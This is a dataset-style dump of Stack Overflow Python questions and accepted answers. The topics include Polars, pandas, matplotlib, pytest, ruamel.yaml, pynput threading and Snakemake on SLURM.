question_id
int64 59.5M
79.6M
| creation_date
stringdate 2020-01-01 00:00:00
2025-05-14 00:00:00
| link
stringlengths 60
163
| question
stringlengths 53
28.9k
| accepted_answer
stringlengths 26
29.3k
| question_vote
int64 1
410
| answer_vote
int64 -9
482
|
---|---|---|---|---|---|---|
79,557,781 | 2025-4-6 | https://stackoverflow.com/questions/79557781/error-using-cv2-in-python3-13-free-threading-mode | Without python3.13 free-threading, cv2 importing numpy is fine. But when python3.13 free-threading is turned on, when cv2 tries to import numpy, numpy gives this error: ImportError: Error importing numpy: you should not try to import numpy from its source directory; please exit the numpy source tree, and relaunch your python interpreter from there. Does this mean cv2 and python3.13 free-threading are not compatible? I'm relatively new to cv2, python3.13 and threading :) | Starting with the 3.13 release, CPython has experimental support for a build of Python called free threading where the global interpreter lock (GIL) is disabled. [...] The free-threaded mode is experimental and work is ongoing to improve it: expect some bugs and a substantial single-threaded performance hit. (From: https://docs.python.org/3/howto/free-threading-python.html. Emphasis mine.) I think that counts as "some bugs". You were right to try this. That's why they're offering this mode now, for users to test with all the things they care about. You could file issues about this with the Python, OpenCV, and Numpy projects. Then they will know to investigate and work on this. CPython (the canonical C Python implementation) tracks issues there: https://github.com/python/cpython/issues?q=is%3Aissue%20state%3Aopen%20label%3Atopic-free-threading It looks like pandas also has trouble importing numpy: https://github.com/python/cpython/issues/120653 | 1 | 1 |
79,556,592 | 2025-4-5 | https://stackoverflow.com/questions/79556592/how-to-repeat-and-truncate-list-elements-to-a-fixed-length | I have data that looks like: lf = pl.LazyFrame( { "points": [ [ [1.0, 2.0], ], [ [3.0, 4.0], [5.0, 6.0], ], [ [7.0, 8.0], [9.0, 10.0], [11.0, 12.0], ], ], "other": ["foo", "bar", "baz"], }, schema={ "points": pl.List(pl.Array(pl.Float32, 2)), "other": pl.String, }, ) And I want to make all lists have the same number of elements. If it currently has more than I need, it should truncate. If it has less than I need, it should repeat itself in order until it has enough. I managed to get it working, but I feel I am jumping through hoops. Is there a cleaner way of doing this? Maybe with gather? target_length = 3 result = ( lf.with_columns( needed=pl.lit(target_length).truediv(pl.col("points").list.len()).ceil() ) .with_columns( pl.col("points") .repeat_by("needed") .list.eval(pl.element().explode()) .list.head(target_length) ) .drop("needed") ) EDIT The method above works for toy examples, but when I try to use it in my real dataset, it fails with: pyo3_runtime.PanicException: Polars' maximum length reached. Consider installing 'polars-u64-idx'. I haven't been able to make a MRE for this, but my data has 4 million rows, and the "points" list on each row has between 1 and 8000 elements (and I'm trying to pad/truncate to 800 elements). These all seem pretty small, I don't see how a maximum u32 length is reached. I appreciate any alternative approaches I can try. The closest I have (which doesn't panic) is: But this doesn't pad repeating the list in order. It just pads repeating the last element. target_length = 3 result = ( lf.with_columns( pl.col("points") .list.gather( pl.int_range(target_length), null_on_oob=True, ) .list.eval(pl.element().forward_fill()) ) .drop("needed") ) | The repr defaults for lists are quite small, so we will increase them for the example. pl.Config(fmt_table_cell_list_len=8, fmt_str_lengths=120) If you use pl.int_ranges() (plural) and modulo arithmetic, you can generate the indices. target_length = 5 lf.select(pl.int_ranges(target_length) % pl.col("points").list.len()).collect() shape: (3, 1) ┌─────────────────┐ │ literal │ │ --- │ │ list[i64] │ ╞═════════════════╡ │ [0, 0, 0, 0, 0] │ │ [0, 1, 0, 1, 0] │ │ [0, 1, 2, 0, 1] │ └─────────────────┘ Which you can pass to .list.gather() lf.with_columns( pl.col("points").list.gather( pl.int_ranges(target_length) % pl.col("points").list.len() ) ).collect() shape: (3, 2) ┌──────────────────────────────────────────────────────────────────┬───────┐ │ points ┆ other │ │ --- ┆ --- │ │ list[array[f32, 2]] ┆ str │ ╞══════════════════════════════════════════════════════════════════╪═══════╡ │ [[1.0, 2.0], [1.0, 2.0], [1.0, 2.0], [1.0, 2.0], [1.0, 2.0]] ┆ foo │ │ [[3.0, 4.0], [5.0, 6.0], [3.0, 4.0], [5.0, 6.0], [3.0, 4.0]] ┆ bar │ │ [[7.0, 8.0], [9.0, 10.0], [11.0, 12.0], [7.0, 8.0], [9.0, 10.0]] ┆ baz │ └──────────────────────────────────────────────────────────────────┴───────┘ | 2 | 2 |
79,553,519 | 2025-4-3 | https://stackoverflow.com/questions/79553519/optimizing-k-ij-free-subgraph-detection-in-a-bounded-degree-graph | I am working with an undirected graph G where the maximum degree is bounded by a constant d. My goal is to check whether G contains a complete bipartite subgraph K_{i,j} as a subgraph, for small values of i, j (specifically, i, j < 8). I currently use the following brute-force approach to detect a K_{i,j} subgraph: nodes = [u for u in self.g if len(self.g[u]) >= j] set_combinations = combinations(nodes, i) for A in set_combinations: common_neighbors = set(self.g) for u in A: common_neighbors &= self.g[u] if len(common_neighbors) >= j: return False # K_ij found return True This method works correctly but becomes slow as the graph size increases. The main bottleneck seems to be: Enumerating all subsets of i nodes (O(n^i) complexity). Intersecting neighbor sets iteratively, which can be costly for large graphs. Given that the maximum degree is bounded and i, j are small, I wonder if there are more efficient approaches. | I incorporated an idea from the comments. I’m iterating through the nodes and, for each node, only consider its neighbors to construct the subgraph K_ij. This reduces the complexity of generating all possible combinations, but it’s still exponential for graphs with a high degree. def is_k_ij_free(self, i: int, j: int) -> bool: if i < 1 or j < 1: raise ValueError("i and j must be greater than 0") if i < j: # swap i and j for better runtime i, j = j, i nodes = {u for u in self.g if len(self.g[u]) >= j} for node in nodes: neighbor_i = {u for u in self.g[node] if len(self.g[u]) >= i} for A in combinations(neighbor_i, j): common_neighbors = set(self.g) for a in A: common_neighbors &= self.g[a] if len(common_neighbors) >= i: return False return True Feel free to further improve it, or point out any errors I have overseen. | 3 | 2 |
79,557,806 | 2025-4-6 | https://stackoverflow.com/questions/79557806/how-to-gracefully-ignore-non-matching-keyword-matching-arguments-in-python-datac | With normal classes you have **kwargs in the __init__ so non-matching keyword arguments can be ignored: class MyClass: def __init__(self, a, **kwargs): self.a=a my_class = MyClass(20, **{"kwarg1" : 1}) Is there an equivalent for @dataclass that can gracefully ignore non-matching keyword arguments without having to include an __init__? from dataclasses import dataclass @dataclass class MyClass: a: int my_class = MyClass(20, **{"kwarg1" : 1}) # TypeError: MyClass.__init__() got an unexpected keyword argument 'kwarg1' | TL;DR No, it's impossible This scenario was even quoted in the original pep introducing dataclass. I think it's against the original assumptions around dataclass - which would be simplify semantics at the expense of making functionality less flexible. vide pep-0557 Sometimes the generated init method does not suffice. For example, suppose you wanted to have an object to store *args and **kwargs: @dataclass(init=False) class ArgHolder: args: List[Any] kwargs: Mapping[Any, Any] def __init__(self, *args, **kwargs): self.args = args self.kwargs = kwargs a = ArgHolder(1, 2, three=3) | 2 | 1 |
79,553,451 | 2025-4-3 | https://stackoverflow.com/questions/79553451/generating-a-discrete-polar-surface-map-in-cartesian-coordinates | I would like to generate a surface plot with discrete arc-shaped cells on a 2D cartesian plane. I am able to get decent results by plotting a 3D surface plot (using plot_surface) and viewing it from the top, but matplotlib can be a bit finicky with 3D, so I'd prefer to do it in 2D. I can also get similar results using pcolormesh on a polar plot, but again, I want a 2D cartesian plane. How can I do this in matplotlib? MRE: import numpy as np import matplotlib.pyplot as plt r = np.linspace(2, 5, 25) theta = np.linspace(0, np.pi, 25) R, Theta = np.meshgrid(r, theta) X = R*np.cos(Theta) Y = r*np.sin(Theta) U = R*np.cos(Theta)*np.exp(R*Theta/500) fig, ax = plt.subplots(figsize=(8,6), subplot_kw={"projection":"3d"}) surf = ax.plot_surface(X, Y, U, cmap="viridis", rstride=1, cstride=1) ax.view_init(elev=90, azim=-90) ax.set_proj_type("ortho") ax.zaxis.line.set_lw(0.) ax.set_zticks([]) ax.set_aspect("equalxy") fig.colorbar(surf, shrink=0.5, aspect=5) fig.tight_layout() fig, ax = plt.subplots(figsize=(8,6), subplot_kw={"projection":"polar"}) ax.pcolor(Theta, R, U, shading="nearest") ax.set_xlim(0, np.pi) ax.grid(False) fig.tight_layout() 3D plot version: 2D polar plot version: | One solution could be to put together the plot from wedge patches. import numpy as np import matplotlib.pyplot as plt from matplotlib.patches import Wedge from matplotlib.collections import PatchCollection r = np.linspace(2, 5, 25) theta = np.linspace(0, np.pi, 25) r_mid = 0.5 * (r[:-1] + r[1:]) theta_mid = 0.5 * (theta[:-1] + theta[1:]) R, Theta = np.meshgrid(r_mid, theta_mid) U = R * np.cos(Theta) * np.exp(R * Theta / 500) patches = [] color = [] for i in range(len(theta) - 1): for j in range(len(r) - 1): t0, t1 = np.degrees(theta[i]), np.degrees(theta[i+1]) #angle bounds in degrees r0, r1 = r[j], r[j+1] #radial bounds wedge = Wedge(center=(0, 0), r=r1, theta1=t0, theta2=t1, width=r1 - r0) patches.append(wedge) color.append(U[i, j]) #coloring fig, ax = plt.subplots(figsize=(8, 6)) collection = PatchCollection(patches, array=np.array(color), cmap='viridis', edgecolor=None) ax.add_collection(collection) ax.set_xlim(-5.5, 5.5) ax.set_ylim(-0.5, 5.5) ax.set_aspect('equal') ax.spines['top'].set_visible(False) ax.spines['right'].set_visible(False) ax.spines['bottom'].set_color('black') ax.spines['left'].set_color('black') fig.colorbar(collection, ax=ax, shrink=0.5) plt.tight_layout() plt.show() | 2 | 2 |
79,557,330 | 2025-4-5 | https://stackoverflow.com/questions/79557330/how-can-i-fix-a-problem-regarding-problem-regarding-l1dist-call | class L1Dist(Layer): def __init__(self, **kwargs): super().__init__() def call(self, input_embedding, validation_img): return tf.math.abs(input_embedding - validation_img) Signature of method 'L1Dist.call()' does not match signature of the base method in class'Layer' how can i fix this problem? | I found the solution : class L1Dist(Layer): def __init__(self, **kwargs): super(L1Dist, self).__init__(**kwargs) def call(self, inputs, *args, **kwargs): input_embedding, validation_embedding = inputs return tf.math.abs(input_embedding - validation_embedding) Instead of having input_embedding and validation_embedding as separate parameters, the method now accepts a single inputs argument, which will be a tuple or list containing both embeddings. as per a tansorflow document and it matches with the base method. found in base_layer.py line 465. sorry i'm bad at explaining things. | 1 | 0 |
79,556,412 | 2025-4-5 | https://stackoverflow.com/questions/79556412/polars-efficient-list-of-substrings-counting | I have a Polars dataframe corpus with one string column, and millions of rows. I also have a list of substrings substrings. I can take a substring and query in how many rows that substring appears with: corpus.select(pl.col('contents').str.contains(substrings[0]).sum()).item() This works well for one substring, but I have 10,000 substrings to check. What is the most efficient way in Polars to check all of them? I have considered converting substrings into its own polars dataframe, and then performing an inner-join on substring presence, grouping by keyword, then counting the size of the groups. However, this seems very expensive from a RAM overhead perspective, and I am limited on RAM. Is there a better/cleaner way? Current slow approach: import polars as pl substrings = pl.DataFrame({'substring': ['a', 'b', 'c']}) corpus = pl.DataFrame({'contents': ['aBMMmcICmY', 'ORqkIJCwjV', 'JTQHufYApo', 'SNoqiJxpMY', 'SYbEsasrzt', 'XLinDPSRld', 'iInkOGqBDU', 'vBtykwGOqN', 'ZIpOdkkXBd', 'iUokuiefBS']}) def count_occurrences(substring): return corpus.select(pl.col('contents').str.contains(substring).sum()).item() substrings = substrings.with_columns(pl.col('substring').map_elements(count_occurrences).alias('frequency')) Outputting: shape: (3, 2) ┌───────────┬───────────┐ │ substring ┆ frequency │ │ --- ┆ --- │ │ str ┆ i64 │ ╞═══════════╪═══════════╡ │ a ┆ 2 │ │ b ┆ 1 │ │ c ┆ 1 │ └───────────┴───────────┘ | substrings = ["ab", "abc", "c"] df = pl.DataFrame({ "contents": ["abcMMmcICm", "ckIJCwjVab", "JTQHufYcpo", "SNoqabcpMY", "SYbEsasrzt"] }) .str.extract_many() has been the fastest way I've found to do this. df.with_columns( pl.col("contents").str.extract_many(substrings).alias("substring") ) shape: (5, 2) ┌────────────┬──────────────────┐ │ contents ┆ substring │ │ --- ┆ --- │ │ str ┆ list[str] │ ╞════════════╪══════════════════╡ │ abcMMmcICm ┆ ["ab", "c", "c"] │ # <- did not find 'abc' │ ckIJCwjVab ┆ ["c", "ab"] │ │ JTQHufYcpo ┆ ["c"] │ │ SNoqabcpMY ┆ ["ab", "c"] │ │ SYbEsasrzt ┆ [] │ └────────────┴──────────────────┘ You need to pass overlapping=True to get "all" the matches. shape: (5, 1) ┌─────────────────────────┐ │ substring │ │ --- │ │ list[str] │ ╞═════════════════════════╡ │ ["ab", "abc", "c", "c"] │ # <- "c" is also found twice │ ["c", "ab"] │ │ ["c"] │ │ ["ab", "abc", "c"] │ │ [] │ └─────────────────────────┘ We don't want to count the same row twice, so we add a row index, .explode() and .unique() If you .group_by() the substring, the length of the group is the count. ( df.select( pl.col("contents").str.extract_many(substrings, overlapping=True) .alias("substring") ) .with_row_index() .explode("substring") .unique() .group_by("substring") .len() .drop_nulls() # empty lists will be null ) shape: (3, 2) ┌───────────┬─────┐ │ substring ┆ len │ │ --- ┆ --- │ │ str ┆ u32 │ ╞═══════════╪═════╡ │ c ┆ 4 │ │ abc ┆ 2 │ │ ab ┆ 3 │ └───────────┴─────┘ Substrings that did not match will not be in the output, you would combine them in if required. | 1 | 1 |
79,556,360 | 2025-4-4 | https://stackoverflow.com/questions/79556360/pytest-fixture-is-changing-the-instance-returned-by-another-fixture | I'm very baffled and a little concerned to discover the following behaviour where I have two tests and two fixtures. import pytest @pytest.fixture def new_object(): return list() @pytest.fixture def a_string(new_object): # Change this instance of the object new_object.append(1) return "a string" def test_1(new_object): assert len(new_object) == 0 def test_2(a_string, new_object): assert len(new_object) == 0 The first test passes but the second one fails. def test_2(a_string, new_object): > assert len(new_object) == 0 E assert 1 == 0 E + where 1 = len([1]) tests/test_pytest_list.py:21: AssertionError ================================================ short test summary info ================================================= FAILED tests/test_pytest_list.py::test_2 - assert 1 == 0 ============================================== 1 failed, 1 passed in 0.36s =============================================== I expected fixtures to pass new instances of an object (unless specified otherwise), not the same object that some other fixture has modified. According to the documentation about the scope of fixtures it says: the default is to invoke once per test function Does another fixture not qualify as a function? UPDATE Based on the comments I now understand the issue, although I still think it's a dangerous behaviour for a unit-testing tool. Here's another invalid use of fixtures which a naive person like myself might not realize is wrong: @pytest.fixture def new_object(): """I want to test instances of this class""" return list() @pytest.fixture def case_1(new_object): new_object.append(1) return new_object @pytest.fixture def case_2(new_object): new_object.append(2) return new_object def test_cases(case_1, case_2): assert sum(case_1) + sum(case_2) == 3 # fails: assert (3 + 3) == 3 | The fixture new_object is invoked for each test as you clearly stated from the documentation. The issue lies within your second fixture and the usage of the combination of both in your second test. As pytest allows you to use fixtures more than once per test without affecting each other by using cached returns. That means as the fixture a_word uses the fixture new_object the second time new_object is encountered in your second test it uses the cached return value from the a_word fixture call instead of giving you another empty list. | 1 | 3 |
79,555,544 | 2025-4-4 | https://stackoverflow.com/questions/79555544/matplotlib-animation-doesnt-clear-previous-frame-before-plotting-new-one | So, I'm trying to create an animated plot, but I want the previous frame to be cleared before a new one appears. What I keep getting is all frames at the same time or just a blank plot. fig, ax = plt.subplots() campo = ax.plot(x2[0], phiSol[0])[0] def init(): campo.set_data([],[]) return campo def update(frame): campo.set_xdata(x2[:frame]) campo.set_ydata(phiSol[:frame]) return campo anima = ani.FuncAnimation(fig=fig, func=update, init_func=init, frames=40, interval=30) HTML(anima.to_jshtml()) I tried to build an init_func, but none of my tries worked. The last try is that one in the above code. How could I do it? | It's your slicing that's causing the problem. with :frame you're slicing up to frame instead of just grabbing the frame you want. You may have copied an example with a moving point that traces out a line . I just tried this, and it worked how you described. import numpy as np import matplotlib.pyplot as plt from matplotlib.animation import FuncAnimation # a sin wave, moving through space (test data) x2 = np.linspace(0, 2*np.pi, 100) phiSol = np.array([np.sin(x2 + phase) for phase in np.linspace(0, 2*np.pi, 60)]) fig, ax = plt.subplots() ax.set_xlim(np.min(x2), np.max(x2)) ax.set_ylim(np.min(phiSol), np.max(phiSol)) campo, = ax.plot([], []) def init(): campo.set_data([], []) return campo, def update(frame): campo.set_data(x2, phiSol[frame]) return campo, ani = FuncAnimation(fig, update, frames=len(phiSol), init_func=init, blit=True) # blit=True not necessary, but can optimize the animation. plt.show() Without the axis limits, mine was showing me an empty window, so you can try removing that and see how it goes, and add something similar if you have problems. I added a couple options to make it a bit better (campo,) to retrieve only the first thing returned by ax.plot instead of a list of objects, and blit=True which can optimize the creation of the animation if it gets slow (see FuncAnimation docs). | 2 | 3 |
79,555,896 | 2025-4-4 | https://stackoverflow.com/questions/79555896/python-script-locked-by-thread | I would like this Python 3.10 script (where the pynput code is partially based on this answer) to enter the while loop and at the same time monitor the keys pressed on the keyboard. When q is pressed, I would like it to end. (I do not know threads very well, but the while loop probably should run in the main thread and the keybord monitor should run in a child, concurrent thread). #!/usr/bin/python3 import threading import sys from pynput import keyboard def on_key_press(key): try: k = key.char except: k = key.name if k in ['q']: exit_time = True exit_time = False print("Press q to close.") keyboard_listener = keyboard.Listener(on_press=on_key_press) keyboard_listener.start() keyboard_listener.join() while not exit_time: sleep(1) print("Goodbye") sys.exit(0) It instead gets locked in an endless wait after keyboard_listener.start(). I don't know if keyboard_listener.join() doesn't run at all, or if it causes the program to lock. However, the while loop is not run. If I end the program with Ctrl+C: ^CTraceback (most recent call last): File "/my/source/./file.py", line 22, in <module> keyboard_listener.join() File "/my/.local/lib/python3.10/site-packages/pynput/_util/__init__.py", line 295, in join super(AbstractListener, self).join(timeout, *args) File "/usr/lib/python3.10/threading.py", line 1096, in join self._wait_for_tstate_lock() File "/usr/lib/python3.10/threading.py", line 1116, in _wait_for_tstate_lock if lock.acquire(block, timeout): KeyboardInterrupt | you are joining the listener thread, ie: waiting for it to exit. remove the while loop. the join is already waiting for the thread to exit. also from the docs Call pynput.keyboard.Listener.stop from anywhere, raise StopException or return False from a callback to stop the listener. you are waiting for the listener to exit, but you never really tell it to exit, you should probably return False to tell it to exit. def on_key_press(key): try: k = key.char except: k = key.name if k in ['q']: return False # end the listener and unlock the main thread if you want to do work within the while loop then remove the join, and use threading.Event, as you can wait for it to be signaled instead of sleeping. #!/usr/bin/python3 import threading import sys from pynput import keyboard from time import sleep def on_key_press(key): try: k = key.char except: k = key.name if k in ['q']: thread_exited.set() return False # end the listener and unlock the main thread thread_exited = threading.Event() print("Press q to close.") keyboard_listener = keyboard.Listener(on_press=on_key_press) keyboard_listener.start() # wait for 1 second for the flag to be set, returns true if it was set while not thread_exited.wait(1): print("doing some work ...") keyboard_listener.join() print("Goodbye") | 1 | 1 |
79,555,775 | 2025-4-4 | https://stackoverflow.com/questions/79555775/concatenate-rows-for-two-columns-in-panda-dataframe | I have the following dataframe: import pandas as pd d = {'Name': ['DataSource', 'DataSource'], 'DomainCode': ['Pr', 'Gov'], 'DomainName': ['Private', 'Government']} df = pd.DataFrame(data=d) So the dataframe is as follows: Name DomainCode DomainName 0 DataSource Pr Private 1 DataSource Gov Government I need to group it by the name to receive two lists: Name DomainCode DomainName 0 DataSource [Pr, Gov] [Private, Government] I understand how to do it for a single column: df = df.groupby("Name")["DomainCode"].apply(list).reset_index() when I receive Name DomainCode 0 A_DataSource [GOV, PR] but I cannot add the second column there whatever I tried. How to do this? One more question is that the list returned by the previous command is somehow not a list as it has a length of 1, and not two. | Please use the following line: df_grouped = df.groupby("Name").agg(list).reset_index() When you run this line df_grouped = df.groupby("Name")["DomainCode"].apply(list).reset_index() It returns 1 instead of 2 because Pandas is storing the list as a single string ('[Pr, Gov]') rather than a true Python list. For conversion to real list (from comment): import ast fake_list = "['Pr', 'Gov']" real_list = ast.literal_eval(fake_list) print(real_list) for item in real_list: print(item) Or: fake_list = "Pr, Gov" real_list = fake_list.split(", ") print(real_list) Or: import json fake_list = '["Pr", "Gov"]' real_list = json.loads(fake_list) print(real_list) Or: import re fake_list = "['Pr', 'Gov']" real_list = re.findall(r"'(.*?)'", fake_list) print(real_list) Output: | 1 | 1 |
79,553,686 | 2025-4-3 | https://stackoverflow.com/questions/79553686/how-to-flatten-a-mapping-constructed-from-a-tagged-scalar-using-ruamel-yaml | My aim is to create a YAML loader that can construct mappings from tagged scalars. Here is a stripped-down version of the loader which constructs an object containing names from a scalar tagged !fullname. import ruamel.yaml class MyLoader(ruamel.yaml.YAML): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.constructor.add_constructor("!fullname", self._fullname_constructor) @staticmethod def _fullname_constructor(constructor, node): value = constructor.construct_scalar(node) first, *middle, last = value.split() return { "first_name": first, "middle_names": middle, "last_name": last } myyaml = MyLoader() The loader can successfully substitute objects for tagged scalars i.e. >>> myyaml.load(""" - !fullname Albus Percival Wulfric Brian Dumbledore - !fullname Severus Snape""") [ {'first_name': 'Albus', 'middle_names': ['Percival', 'Wulfric', 'Brian'], 'last_name': 'Dumbledore'}, {'first_name': 'Severus', 'middle_names': [], 'last_name': 'Snape'} ] However, the construction fails when I try to merge the constructed mapping into an enclosing object >>> yaml.load(""" id: 0 <<: !fullname Albus Percival Wulfric Brian Dumbledore""") ruamel.yaml.constructor.ConstructorError: while constructing a mapping (...) expected a mapping or list of mappings for merging, but found scalar My understanding is that the type of the node is still a ScalarNode, so the constructor is unable to process it even though it ultimately resolves to a mapping. How to modify my code, such that !fullname {scalar} can be merged into the object? | The merge key language indepent type for YAML definition states: The “<<” merge key is used to indicate that all the keys of one or more specified maps should be inserted in to the current map. If the value associated with the key is a single mapping node, each of its key/value pairs is inserted into the current mapping, unless the key already exists in it. If the value associated with the merge key is a sequence, then this sequence is expected to contain mapping nodes and each of these nodes is merged in turn according to its order in the sequence. Keys in mapping nodes earlier in the sequence override keys specified in later mapping nodes. You have a scalar node, not a mapping node or a sequence of mapping nodes. This is independent of the (Python) type that gets constructed from the scalar node. If you want to adapt the parser to accept your non-YAML, you need to adapt the flattening routine that handles the merges. Among other things this expects a ruamel.yaml.commments.CommentedMap and not a simple dict: # coding: utf-8 import sys from pathlib import Path import ruamel.yaml import ruamel.yaml class MyConstructor(ruamel.yaml.constructor.RoundTripConstructor): def flatten_mapping(self, node): def constructed(value_node): if value_node in self.constructed_objects: value = self.constructed_objects[value_node] else: value = self.construct_object(value_node, deep=True) return value # merge = [] merge_map_list: List[Any] = [] index = 0 while index < len(node.value): key_node, value_node = node.value[index] if key_node.tag == 'tag:yaml.org,2002:merge': if merge_map_list: # double << key if self.allow_duplicate_keys: del node.value[index] index += 1 continue args = [ 'while constructing a mapping', node.start_mark, f'found duplicate key "{key_node.value}"', key_node.start_mark, """ To suppress this check see: http://yaml.readthedocs.io/en/latest/api.html#duplicate-keys """, """\ Duplicate keys will become an error in future releases, and are errors by default when using the new API. """, ] if self.allow_duplicate_keys is None: warnings.warn(DuplicateKeyFutureWarning(*args), stacklevel=1) else: raise DuplicateKeyError(*args) del node.value[index] cval = constructed(value_node) if isinstance(value_node, ruamel.yaml.nodes.MappingNode): merge_map_list.append((index, cval)) elif isinstance(value_node, ruamel.yaml.nodes.SequenceNode): for subnode in value_node.value: if not isinstance(subnode, ruamel.yaml.nodes.MappingNode): raise ConstructorError( 'while constructing a mapping', node.start_mark, f'expected a mapping for merging, but found {subnode.id!s}', subnode.start_mark, ) merge_map_list.append((index, constructed(subnode))) elif isinstance(value_node, ruamel.yaml.nodes.ScalarNode) and isinstance(cval, dict): merge_map_list.append((index, cval)) else: raise ConstructorError( 'while constructing a mapping', node.start_mark, 'expected a mapping or list of mappings for merging, ' f'but found {value_node.id!s}', value_node.start_mark, ) elif key_node.tag == 'tag:yaml.org,2002:value': key_node.tag = 'tag:yaml.org,2002:str' index += 1 else: index += 1 return merge_map_list class MyLoader(ruamel.yaml.YAML): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.Constructor = MyConstructor self.constructor.add_constructor("!fullname", self._fullname_constructor) @staticmethod def _fullname_constructor(constructor, node): value = constructor.construct_scalar(node) first, *middle, last = value.split() return ruamel.yaml.comments.CommentedMap({ "first_name": first, "middle_names": middle, "last_name": last }) myyaml = MyLoader() data = myyaml.load("""\ id: 0 <<: !fullname Albus Percival Wulfric Brian Dumbledore """) print(f'{data=}') print() myyaml.dump(data, sys.stdout) which gives: data={'id': 0, 'first_name': 'Albus', 'middle_names': ['Percival', 'Wulfric', 'Brian'], 'last_name': 'Dumbledore'} id: 0 <<: first_name: Albus middle_names: - Percival - Wulfric - Brian last_name: Dumbledore As you can see the merge is preserved when dumping, but the scalar is not reconstructed. | 1 | 1 |
79,550,367 | 2025-4-2 | https://stackoverflow.com/questions/79550367/snakemake-in-cluster-different-ways | When running snakemake on a cluster, and if we don't have specific requirements for some rules about number of cores/memory, then what is the difference between : Using the classic way, i.e. calling snakemake on the login node, telling it that executor is slurm and that we want X jobs with X cores each, optionally with a profile config file (1 job = 1 rule) Using snakemake like a normal tool, and call it with srun inside a sbatch script without telling it that this is a slurm environment (1 job = whole pipeline) Example of the second option: #!/bin/bash #SBATCH --job-name=test_sbatch_snakemake #SBATCH --nodes=1 #SBATCH --ntasks=1 #SBATCH --cpus-per-task=64 srun snakemake --cores 64 \ --latency-wait 30 \ --nolock \ --configfile configs/S_with_N.yaml I have a pipeline where I don't have any specific capacity requirement for my rules (I just want the maximum of them running in parallel), and I think the second option is easier to implement. | With the second way, your whole workflow will have to wait in the queue before individual rule instances can start. With the first way the resource demand will be spread across the jobs that snakemake will submit, so each rule has a chance to start earlier than what you would have to wait in the second way. (I use a third way: I sbatch a snakemake command that uses slurm as executor. In our cluster, it is considered bad practice to run the main snakemake on the submit/login node. This main snakemake doesn't wait too much in the queue, because it doesn't have to claim a lot of resources.) | 1 | 1 |
79,554,176 | 2025-4-3 | https://stackoverflow.com/questions/79554176/how-to-randomly-sample-n-ids-for-each-combination-of-group-id-and-date-in-a-pola | I am trying to randomly sample n IDs for each combination of group_id and date in a Polars DataFrame. However, I noticed that the sample function is producing the same set of IDs for each date no matter the group. Since I need to set a seed for replication purposes, I believe the issue is occurring because the same seed value is being applied across all combinations. I tried to resolve this by creating a unique seed for each combination by generating a "group_date_int" column by combining group_id and date casted as Int64, but I encountered the following error: .sample(n=n_samples, shuffle=True, seed=pl.col("group_date_int")) TypeError: argument 'seed': 'Expr' object cannot be interpreted as an integer For each date, I am getting the same set of IDs, rather than having a different random sample for each combination of group_id and date. import polars as pl df = pl.DataFrame( { "date": pl.date_range( pl.date(2010, 1, 1), pl.date(2025, 12, 1), "1mo", eager=True ).implode(), "group_id": [["bd01", "bd02", "bd03"]], "ids": [list(range(10))], } ).explode("date").explode("group_id").explode("ids") # Parameters n_samples = 3 # Number of random samples to pick for each group SEED = 42 # The seed used for sampling # Create `selected_samples` by sampling `n_samples` IDs per (group_id, date) combination selected_samples = ( df .group_by(['group_id', 'date']) .agg( pl.col("id") .sample(n=n_samples, shuffle=True, seed=SEED) .alias("random_ids") ) .explode("random_ids") .select(["group_id", "date", "random_ids"]) .rename({"random_ids": "id"}) ) Additionally, I tried using the shuffle function, but the results are the same: 1,6,5...1,6,5 ┌──────────┬────────────┬─────┐ │ group_id ┆ date ┆ id │ │ --- ┆ --- ┆ --- │ │ str ┆ str ┆ i64 │ ╞══════════╪════════════╪═════╡ │ bd01 ┆ 2025-07-01 ┆ 1 │ │ bd01 ┆ 2025-07-01 ┆ 6 │ │ bd01 ┆ 2025-07-01 ┆ 5 │ │ bd01 ┆ 2012-03-01 ┆ 1 │ │ bd01 ┆ 2012-03-01 ┆ 6 │ │ … ┆ … ┆ … │ │ bd03 ┆ 2024-10-01 ┆ 6 │ │ bd03 ┆ 2024-10-01 ┆ 5 │ │ bd01 ┆ 2010-08-01 ┆ 1 │ │ bd01 ┆ 2010-08-01 ┆ 6 │ │ bd01 ┆ 2010-08-01 ┆ 5 │ └──────────┴────────────┴─────┘ I was referred to the following question in the comments: Sample from each group in polars dataframe?, where a similar issue was raised. However, the solution does not include a seed, which is needed for replication. | If you need each group to be random but you also need to be able to set a seed to get predictable results then use numpy to generate random numbers and then choose your sample based on those like this. (Technically you could use base python to generate the random numbers but it's slower) First approach n_samples = 3 SEED = 46 np.random.seed(SEED) ( df .with_columns( pl.col("ids") .sort_by(pl.Series(np.random.normal(0,1,df.shape[0])))) .group_by("group_id","date",maintain_order=True) .agg(pl.col("ids").gather(range(n_samples))) .explode("ids") ) Note I also set maintain_order=True in the group_by as that would otherwise be random. Second approach Having to do a sort over the whole series might be needlessly expensive. If we use numpy to create a 2d array which is sorted rowwise then use that to pick our indices it, in theory, should be more efficient. However, this only works if you have a fixed number of members per group and you know how many in advance. First, make this function def keep_args(members_per_group: int, n_samples: int, rows: int): return pl.Series( np.argsort( np.random.normal(0, 1, (rows, members_per_group)), axis=1)[:, :n_samples], dtype=pl.List(pl.Int32), ) It's going to generate a 2d array where each row has a random list of indices to choose. We use it with our df like this np.random.seed(SEED) ( df .group_by("group_id","date",maintain_order=True) .agg(pl.col("ids")) .with_columns( pl.col("ids").map_batches(lambda s: ( s.list.gather(keep_args(10, n_samples, s.len())) )) ) .explode("ids") ) In this version, we do the group_by first which then means we need to use map_batches to get the new len of ids. If you prefer you could do a pipe and use the new df.height but I don't think it would make a big difference either way. Performance diff In testing those two, the first was 10.4ms and the second was 9.97ms so basically the same. Third approach Here's a polars only approach that is about 60x slower than the above. Basically it just chops up your df into the individual groups and then samples them. pl.concat([ g.sample(n_samples, seed=SEED) for (_, g) in df.group_by("group_id","date",maintain_order=True) ]) Fourth approach You can convert each of the groups to lazy to get parallelism which reduces the time by 33% making it just 40x slower than numpy approaches ( pl.concat([ g.lazy() .select( pl.col("group_id","date").first(), pl.col("ids") .sample(n_samples, seed=SEED) .implode() ) for (_, g) in df.group_by("group_id","date",maintain_order=True) ]) .explode("ids") .collect() ) Note about seed Maybe this goes without saying but just incase, the result between each approach will be different even with the same seed. The results are only consistent within a particular approach. Also, just to reiterate, you must use maintain_order=True in the first two approaches to get consistent results. | 1 | 1 |
